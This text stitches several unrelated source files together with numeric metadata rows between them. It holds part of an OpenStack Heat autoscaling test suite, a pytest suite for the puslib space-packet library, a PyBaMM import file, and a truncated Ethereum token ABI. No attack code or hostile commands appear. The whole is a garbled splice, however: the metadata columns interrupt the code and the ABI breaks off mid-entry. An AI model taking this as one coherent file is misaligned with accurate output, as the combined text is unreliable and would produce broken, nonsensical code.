self.m.StubOutWithMock(rsrc, 'metadata_get')
self.m.StubOutWithMock(up_policy, 'metadata_get')
up_policy.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
rsrc.metadata_get().MultipleTimes().AndReturn(prev_meta.copy())
now = now + datetime.timedelta(seconds=61)
self._stub_lb_reload(4, unset=False)
self._stub_meta_expected(now, 'ChangeInCapacity : 2', 2)
self._stub_create(2)
self.m.ReplayAll()
# Trigger alarm
up_policy.signal()
self.assertEqual(4, len(rsrc.get_instance_names()))
rsrc.delete()
self.m.VerifyAll()
def test_vpc_zone_identifier(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['VPCZoneIdentifier'] = ['xxxx']
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1', 0)
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
instances = rsrc.get_instances()
self.assertEqual(1, len(instances))
self.assertEqual('xxxx', instances[0].properties['SubnetId'])
rsrc.delete()
self.m.VerifyAll()
def test_toomany_vpc_zone_identifier(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['VPCZoneIdentifier'] = ['xxxx', 'yyyy']
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
self.assertRaises(exception.NotSupported,
self.create_scaling_group, t,
stack, 'WebServerGroup')
self.m.VerifyAll()
def test_invalid_min_size(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '-1'
properties['MaxSize'] = '2'
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'WebServerGroup')
expected_msg = "The size of AutoScalingGroup can not be less than zero"
self.assertEqual(expected_msg, six.text_type(e))
self.m.VerifyAll()
def test_invalid_max_size(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '3'
properties['MaxSize'] = '1'
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'WebServerGroup')
expected_msg = "MinSize can not be greater than MaxSize"
self.assertEqual(expected_msg, six.text_type(e))
self.m.VerifyAll()
def test_invalid_desiredcapacity(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
properties['DesiredCapacity'] = '4'
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'WebServerGroup')
expected_msg = "DesiredCapacity must be between MinSize and MaxSize"
self.assertEqual(expected_msg, six.text_type(e))
self.m.VerifyAll()
def test_invalid_desiredcapacity_zero(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '3'
properties['DesiredCapacity'] = '0'
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'WebServerGroup')
expected_msg = "DesiredCapacity must be between MinSize and MaxSize"
self.assertEqual(expected_msg, six.text_type(e))
self.m.VerifyAll()
def test_child_template_uses_min_size(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
defn = rsrc_defn.ResourceDefinition(
'asg', 'AWS::AutoScaling::AutoScalingGroup',
{'MinSize': 2, 'MaxSize': 5, 'LaunchConfigurationName': 'foo'})
rsrc = asc.AutoScalingGroup('asg', defn, stack)
rsrc._create_template = mock.Mock(return_value='tpl')
self.assertEqual('tpl', rsrc.child_template())
rsrc._create_template.assert_called_once_with(2)
def test_child_template_uses_desired_capacity(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
defn = rsrc_defn.ResourceDefinition(
'asg', 'AWS::AutoScaling::AutoScalingGroup',
{'MinSize': 2, 'MaxSize': 5, 'DesiredCapacity': 3,
'LaunchConfigurationName': 'foo'})
rsrc = asc.AutoScalingGroup('asg', defn, stack)
rsrc._create_template = mock.Mock(return_value='tpl')
self.assertEqual('tpl', rsrc.child_template())
rsrc._create_template.assert_called_once_with(3)
def test_launch_config_get_ref_by_id(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
rsrc = stack['LaunchConfig']
self.stub_ImageConstraint_validate()
self.assertIsNone(rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
# use physical_resource_name when rsrc.id is not None
self.assertIsNotNone(rsrc.id)
expected = '%s-%s-%s' % (rsrc.stack.name,
rsrc.name,
short_id.get_id(rsrc.id))
self.assertEqual(expected, rsrc.FnGetRefId())
# otherwise use parent method
rsrc.id = None
self.assertIsNone(rsrc.resource_id)
self.assertEqual('LaunchConfig', rsrc.FnGetRefId())
def test_validate_BlockDeviceMappings_without_Ebs_property(self):
t = template_format.parse(as_template)
lcp = t['Resources']['LaunchConfig']['Properties']
bdm = [{'DeviceName': 'vdb'}]
lcp['BlockDeviceMappings'] = bdm
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'LaunchConfig')
self.assertIn("Ebs is missing, this is required",
six.text_type(e))
self.m.VerifyAll()
def test_validate_BlockDeviceMappings_without_SnapshotId_property(self):
t = template_format.parse(as_template)
lcp = t['Resources']['LaunchConfig']['Properties']
bdm = [{'DeviceName': 'vdb',
'Ebs': {'VolumeSize': '1'}}]
lcp['BlockDeviceMappings'] = bdm
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'LaunchConfig')
self.assertIn("SnapshotId is missing, this is required",
six.text_type(e))
self.m.VerifyAll()
def test_validate_BlockDeviceMappings_without_DeviceName_property(self):
t = template_format.parse(as_template)
lcp = t['Resources']['LaunchConfig']['Properties']
bdm = [{'Ebs': {'SnapshotId': '1234',
'VolumeSize': '1'}}]
lcp['BlockDeviceMappings'] = bdm
stack = utils.parse_stack(t, params=self.params)
self.stub_ImageConstraint_validate()
self.m.ReplayAll()
e = self.assertRaises(exception.StackValidationFailed,
self.create_scaling_group, t,
stack, 'LaunchConfig')
excepted_error = ('Property error : LaunchConfig: BlockDeviceMappings '
'Property error : BlockDeviceMappings: 0 Property '
'error : 0: Property DeviceName not assigned')
self.assertIn(excepted_error, six.text_type(e))
self.m.VerifyAll()
class TestInstanceGroup(HeatTestCase):
params = {'KeyName': 'test', 'ImageId': 'foo'}
def setUp(self):
super(TestInstanceGroup, self).setUp()
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
defn = rsrc_defn.ResourceDefinition('ig', 'OS::Heat::InstanceGroup',
{'Size': 2,
'LaunchConfigurationName': 'foo'})
self.instance_group = asc.InstanceGroup('ig', defn, stack)
def test_child_template(self):
self.instance_group._create_template = mock.Mock(return_value='tpl')
self.assertEqual('tpl', self.instance_group.child_template())
self.instance_group._create_template.assert_called_once_with(2)
def test_child_params(self):
self.instance_group._environment = mock.Mock(return_value='env')
self.assertEqual('env', self.instance_group.child_params())
| 38.807892
| 79
| 0.610725
| 8,013
| 74,744
| 5.494072
| 0.060402
| 0.039615
| 0.027667
| 0.030892
| 0.830547
| 0.7997
| 0.77192
| 0.746888
| 0.718222
| 0.6916
| 0
| 0.011761
| 0.276517
| 74,744
| 1,925
| 80
| 38.828052
| 0.802352
| 0.065985
| 0
| 0.728261
| 0
| 0
| 0.138275
| 0.025428
| 0
| 0
| 0
| 0
| 0.103261
| 1
| 0.042799
| false
| 0
| 0.014266
| 0
| 0.063859
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a030cdea5ef1df06d8231cb018eaa65e7c91b2d1
| 12,860
|
py
|
Python
|
tests/test_packet.py
|
pxntus/puslib
|
2613d03e3efb1e26c4c016a91aaa81834cfff043
|
[
"MIT"
] | 4
|
2022-02-14T14:05:19.000Z
|
2022-03-14T00:00:37.000Z
|
tests/test_packet.py
|
pxntus/puslib
|
2613d03e3efb1e26c4c016a91aaa81834cfff043
|
[
"MIT"
] | null | null | null |
tests/test_packet.py
|
pxntus/puslib
|
2613d03e3efb1e26c4c016a91aaa81834cfff043
|
[
"MIT"
] | 1
|
2022-02-20T21:47:33.000Z
|
2022-02-20T21:47:33.000Z
|
from collections import namedtuple
import pytest
from puslib.packet import CcsdsSpacePacket
from puslib.packet import PusTcPacket
from puslib.packet import PusTmPacket
from puslib.packet import PacketType
from puslib.packet import AckFlag
from puslib.time import CucTime
APID = 0x10
SEQ_COUNT_OR_NAME = 0x50
PUS_SERVICE = 8
PUS_SUBSERVICE = 1
TC_SOURCE = 0x2021
DATA = bytes.fromhex('DEADBEEF')
CcsdsPacketArgs = namedtuple('CcsdsPacketArgs', ['packet_version_number', 'packet_type', 'secondary_header_flag', 'apid', 'seq_flags', 'seq_count_or_name', 'data', 'has_pec'])
@pytest.mark.parametrize("args", [
CcsdsPacketArgs(None, PacketType.TC, None, APID, None, SEQ_COUNT_OR_NAME, b'', True),
CcsdsPacketArgs(None, PacketType.TC, None, APID, None, SEQ_COUNT_OR_NAME, b'', False),
CcsdsPacketArgs(0, PacketType.TM, True, APID, 0b11, SEQ_COUNT_OR_NAME, DATA, True),
CcsdsPacketArgs(0, PacketType.TM, False, APID, 0b11, SEQ_COUNT_OR_NAME, DATA, False),
])
def test_create_ccsds_packet(args):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = CcsdsSpacePacket.create(**args_to_pass)
assert packet.header.packet_version_number == args.packet_version_number if args.packet_version_number else 1
assert packet.header.packet_type == args.packet_type
assert packet.packet_type == args.packet_type
assert packet.header.secondary_header_flag == args.secondary_header_flag if args.secondary_header_flag else True
assert packet.header.apid == args.apid
assert packet.apid == args.apid
assert packet.header.seq_flags == args.seq_flags if args.seq_flags else 0b11
assert packet.header.seq_count_or_name == args.seq_count_or_name
assert packet.payload == args.data
assert len(packet) == 6 + (len(args.data) if args.data else 0) + (2 if args.has_pec else 0)
TcPacketArgs = namedtuple('TcPacketArgs', ['apid', 'name', 'pus_version', 'ack_flags', 'service_type', 'service_subtype', 'source', 'data', 'has_pec'])
@pytest.mark.parametrize("args", [
TcPacketArgs(APID, SEQ_COUNT_OR_NAME, 1, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, None, True),
TcPacketArgs(APID, SEQ_COUNT_OR_NAME, 2, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, None, True),
TcPacketArgs(APID, SEQ_COUNT_OR_NAME, 2, AckFlag.ACCEPTANCE | AckFlag.COMPLETION, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True),
])
def test_tc_packet_create(args):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = PusTcPacket.create(**args_to_pass)
assert packet.name == args.name
assert packet.secondary_header.pus_version == args.pus_version
assert packet.secondary_header.ack_flags == args.ack_flags
assert packet.secondary_header.service_type == args.service_type
assert packet.secondary_header.service_subtype == args.service_subtype
assert packet.secondary_header.source == args.source
@pytest.mark.parametrize("args, length", [
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, None, False), 9),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', True), 11),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', False), 11),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', True), 13),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, False), 15),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True), 17),
])
def test_tc_packet_length(args, length):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = PusTcPacket.create(**args_to_pass)
assert len(packet) == length
@pytest.mark.parametrize("args, binary", [
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', False), bytes.fromhex('1810c0500002210801')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', True), bytes.fromhex('1810c0500004210801bbc9')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', False), bytes.fromhex('1810c05000042108012021')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', True), bytes.fromhex('1810c050000621080120213377')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, False), bytes.fromhex('1810c05000082108012021deadbeef')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True), bytes.fromhex('1810c050000a2108012021deadbeefc984')),
])
def test_tc_packet_serialize(args, binary):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = PusTcPacket.create(**args_to_pass)
buffer = packet.serialize()
assert len(packet) == len(buffer)
assert len(buffer) == len(binary)
assert buffer == binary
assert bytes(packet) == binary
@pytest.mark.parametrize("args, binary", [
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', False), bytes.fromhex('1810c0500002210801')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, None, b'', True), bytes.fromhex('1810c0500004210801bbc9')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', False), bytes.fromhex('1810c05000042108012021')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, b'', True), bytes.fromhex('1810c050000621080120213377')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, False), bytes.fromhex('1810c05000082108012021deadbeef')),
(TcPacketArgs(APID, SEQ_COUNT_OR_NAME, None, AckFlag.ACCEPTANCE, PUS_SERVICE, PUS_SUBSERVICE, TC_SOURCE, DATA, True), bytes.fromhex('1810c050000a2108012021deadbeefc984')),
])
def test_tc_packet_deserialize(args, binary):
_, packet = PusTcPacket.deserialize(binary, has_source_field=True if args.source else False, has_pec=True if args.has_pec else False)
assert packet.apid == args.apid
assert packet.name == args.name
assert packet.secondary_header.pus_version == (args.pus_version if args.pus_version else 2)
assert packet.secondary_header.ack_flags == args.ack_flags
assert packet.service == args.service_type
assert packet.subservice == args.service_subtype
assert packet.source == args.source
assert packet.app_data == args.data
assert packet.has_pec == args.has_pec
buffer = packet.serialize()
assert len(buffer) == len(binary)
assert buffer == binary
PUS_SERVICE = 130
PUS_SUBSERVICE = 4
MSG_TYPE_COUNTER = 0x1314
TM_DESTINATION = 0x2021
TIME = CucTime(100, 10000, 4, 2)
DATA = bytes.fromhex('DEADBEEF')
TmPacketArgs = namedtuple('TmPacketArgs', ['apid', 'seq_count', 'pus_version', 'spacecraft_time_ref_status', 'service_type', 'service_subtype', 'msg_type_counter', 'destination', 'time', 'data', 'has_pec'])
@pytest.mark.parametrize("args", [
TmPacketArgs(APID, SEQ_COUNT_OR_NAME, 1, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, b'', True),
TmPacketArgs(APID, SEQ_COUNT_OR_NAME, 2, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True),
])
def test_tm_packet_create(args):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = PusTmPacket.create(**args_to_pass)
assert packet.seq_count == args.seq_count
assert packet.secondary_header.pus_version == args.pus_version
assert packet.secondary_header.spacecraft_time_ref_status == (args.spacecraft_time_ref_status if args.spacecraft_time_ref_status else 0)
assert packet.secondary_header.service_type == args.service_type
assert packet.secondary_header.service_subtype == args.service_subtype
assert packet.secondary_header.msg_type_counter == args.msg_type_counter
assert packet.secondary_header.destination == args.destination
assert packet.secondary_header.time == args.time
assert packet.source_data == args.data
@pytest.mark.parametrize("args, length", [
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, None, False), 16),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, None, TIME, None, False), 18),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, None, False), 20),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, False), 24),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True), 26),
])
def test_tm_packet_length(args, length):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = PusTmPacket.create(**args_to_pass)
assert len(packet) == length
@pytest.mark.parametrize("args, binary", [
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, None, False), bytes.fromhex('0810c0500009208204') + bytes(TIME)),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, None, TIME, None, False), bytes.fromhex('0810c050000b2082041314') + bytes(TIME)),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, None, False), bytes.fromhex('0810c050000d21820413142021') + bytes(TIME)),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, False), bytes.fromhex('0810c050001121820413142021') + bytes(TIME) + DATA),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True), bytes.fromhex('0810c050001321820413142021') + bytes(TIME) + DATA + bytes.fromhex('0483')),
])
def test_tm_packet_serialize(args, binary):
args_to_pass = {k: v for k, v in args._asdict().items() if v is not None}
packet = PusTmPacket.create(**args_to_pass)
buffer = packet.serialize()
assert len(packet) == len(buffer)
assert len(buffer) == len(binary)
assert buffer == binary
assert bytes(packet) == binary
@pytest.mark.parametrize("args, binary", [
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, None, None, TIME, b'', False), bytes.fromhex('0810c0500009208204') + bytes(TIME)),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, None, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, None, TIME, b'', False), bytes.fromhex('0810c050000b2082041314') + bytes(TIME)),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, b'', False), bytes.fromhex('0810c050000d21820413142021') + bytes(TIME)),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, False), bytes.fromhex('0810c050001121820413142021') + bytes(TIME) + DATA),
(TmPacketArgs(APID, SEQ_COUNT_OR_NAME, None, 1, PUS_SERVICE, PUS_SUBSERVICE, MSG_TYPE_COUNTER, TM_DESTINATION, TIME, DATA, True), bytes.fromhex('0810c050001321820413142021') + bytes(TIME) + DATA + bytes.fromhex('0483')),
])
def test_tm_packet_deserialize(args, binary):
_, packet = PusTmPacket.deserialize(binary, has_type_counter_field=True if args.msg_type_counter else False, has_destination_field=True if args.destination else False, cuc_time=TIME, has_pec=True if args.has_pec else False)
assert packet.apid == args.apid
assert packet.seq_count == args.seq_count
assert packet.secondary_header.pus_version == (args.pus_version if args.pus_version else 2)
assert packet.secondary_header.spacecraft_time_ref_status == (args.spacecraft_time_ref_status if args.spacecraft_time_ref_status else 0)
assert packet.service == args.service_type
assert packet.subservice == args.service_subtype
assert packet.counter == args.msg_type_counter
assert packet.destination == args.destination
assert packet.time == args.time
assert packet.source_data == args.data
assert packet.has_pec == args.has_pec
buffer = packet.serialize()
assert len(buffer) == len(binary)
assert buffer == binary
| 63.039216
| 227
| 0.757387
| 1,767
| 12,860
| 5.246746
| 0.068478
| 0.044008
| 0.049617
| 0.069464
| 0.825693
| 0.800345
| 0.787186
| 0.75062
| 0.737892
| 0.725704
| 0
| 0.050599
| 0.124028
| 12,860
| 203
| 228
| 63.349754
| 0.772392
| 0
| 0
| 0.549708
| 0
| 0
| 0.075583
| 0.04168
| 0
| 0
| 0.002022
| 0
| 0.345029
| 1
| 0.052632
| false
| 0.081871
| 0.046784
| 0
| 0.099415
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
13fbe8487de335f7102881b9e1d006dd1d370dd4
| 103
|
py
|
Python
|
pybamm/models/submodels/transport_efficiency/__init__.py
|
dion-w/PyBaMM
|
aeb9bcc82bb5dc3fba4fa045c4cad9d2d41b6359
|
[
"BSD-3-Clause"
] | 1
|
2022-03-24T01:23:16.000Z
|
2022-03-24T01:23:16.000Z
|
pybamm/models/submodels/transport_efficiency/__init__.py
|
sxwangxiang/PyBaMM
|
23157aebce218444edc83b525dfb2c7fc8637598
|
[
"BSD-3-Clause"
] | null | null | null |
pybamm/models/submodels/transport_efficiency/__init__.py
|
sxwangxiang/PyBaMM
|
23157aebce218444edc83b525dfb2c7fc8637598
|
[
"BSD-3-Clause"
] | null | null | null |
from .base_transport_efficiency import BaseModel
from .bruggeman_transport_efficiency import Bruggeman
| 34.333333
| 53
| 0.902913
| 12
| 103
| 7.416667
| 0.583333
| 0.426966
| 0.561798
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 103
| 2
| 54
| 51.5
| 0.936842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cd5eb21232223b11472ad84e1a66109da9bc1139
| 7,114
|
py
|
Python
|
utils/abi/dai_abi.py
|
Polar-DANO/polarbot
|
c1a0c03e3ca0b9925397cad62ab0117bf9483216
|
[
"MIT"
] | null | null | null |
utils/abi/dai_abi.py
|
Polar-DANO/polarbot
|
c1a0c03e3ca0b9925397cad62ab0117bf9483216
|
[
"MIT"
] | null | null | null |
utils/abi/dai_abi.py
|
Polar-DANO/polarbot
|
c1a0c03e3ca0b9925397cad62ab0117bf9483216
|
[
"MIT"
] | null | null | null |
abi = [{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"AddSupportedChainId","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"contractAddress","type":"address"},{"indexed":False,"internalType":"uint256","name":"supplyIncrement","type":"uint256"}],"name":"AddSwapToken","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"internalType":"address","name":"owner","type":"address"},{"indexed":True,"internalType":"address","name":"spender","type":"address"},{"indexed":False,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"newBridgeRoleAddress","type":"address"}],"name":"MigrateBridgeRole","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"to","type":"address"},{"indexed":False,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":False,"internalType":"address","name":"feeAddress","type":"address"},{"indexed":False,"internalType":"uint256","name":"feeAmount","type":"uint256"},{"indexed":False,"internalType":"bytes32","name":"originTxId","type":"bytes32"}],"name":"Mint","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"contractAddress","type":"address"},{"indexed":False,"internalType":"uint256","name":"supplyDecrement","type":"uint256"}],"name":"RemoveSwapToken","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"address","name":"token","type":"address"},{"indexed":False,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Swap","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"internalType":"address","name":"from","type":"address"},{"indexed":True,"internalType":"address","name":"to","type":"address"},{"indexed":False,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":False,"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"Unwrap","type":"event"},{"inputs":[{"internalType":"uint256","name":"chainId","type":"uint256"}],"name":"addSupportedChainId","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"contractAddress","type":"address"},{"internalType":"uint256","name":"supplyIncrement","type":"uint256"}],"name":"addSwapToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"chainIds","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newBridgeRoleAddress","type":"address"}],"name":"migrateBridgeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"feeAddress","type":"address"},{"internalType":"uint256","name":"feeAmount","type":"uint25